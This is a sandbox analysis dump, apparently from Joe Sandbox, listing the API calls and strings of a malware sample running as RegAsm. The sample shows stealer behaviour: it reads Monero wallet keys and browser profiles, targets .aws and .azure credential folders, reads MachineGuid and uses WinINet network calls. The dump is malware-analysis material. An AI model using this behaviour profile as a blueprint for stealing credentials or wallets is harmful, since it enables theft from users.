                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                    • memset.MSVCRT ref: 00401E9D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                    • API String ID: 2725398440-218353709
                                                                                    • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                    • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                    • wsprintfA.USER32 ref: 00410132
                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                    • String ID: - $%s\%s$?
                                                                                    • API String ID: 404191982-3278919252
                                                                                    • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                    • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                                    • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                    • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                    • memset.MSVCRT ref: 0040F708
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                      • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                    Strings
                                                                                    • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                    • API String ID: 3050127167-1622206642
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004104E2
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • wsprintfA.USER32 ref: 004105AD
                                                                                    • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                      • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                      • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                    • String ID: :\$C
                                                                                    • API String ID: 688099012-3309953409
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3807055897-1526165396
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy
                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                    • API String ID: 2120869262-2697854757
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2737972104-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416964
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,00426563,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                      • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                      • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                      • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                      • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                      • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                      • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                      • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                      • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426518,?,?,?,?,00416EC0), ref: 00411821
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                      • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                    • String ID: 5A&6A
                                                                                    • API String ID: 1955031769-2983527881
                                                                                    • Opcode ID: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                                    • Instruction ID: bb05b1d9e7c39d7df88ecf206bceb681005d45f58bf20589137b6770423741ef
                                                                                    • Opcode Fuzzy Hash: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                                    • Instruction Fuzzy Hash: AC4242B1D00358AADF10EBA5CD46BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00406190
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 3869837436-0
                                                                                    • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                    • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041043B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                    • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                    • CharToOemA.USER32(?,?), ref: 00410493
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharOpenQueryValuememset
                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                    • API String ID: 1728412123-1211650757
                                                                                    • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                    • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                                    • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                    • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                    • wsprintfA.USER32 ref: 0040FFDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 3644086013-3474575989
                                                                                    • Opcode ID: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                                    • Instruction ID: 4fd6b884c886e70f5bea54c710daa34e5fcd35151b99761237641847ab172de6
                                                                                    • Opcode Fuzzy Hash: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                                    • Instruction Fuzzy Hash: A5F030B5A40218ABEB149BA4DC4AFBE76BEEB45705F400139F706E62C0DBB8D8058775
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                    • memset.MSVCRT ref: 00415CD6
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                    • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2333602472-0
                                                                                    • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                    • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                    APIs
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
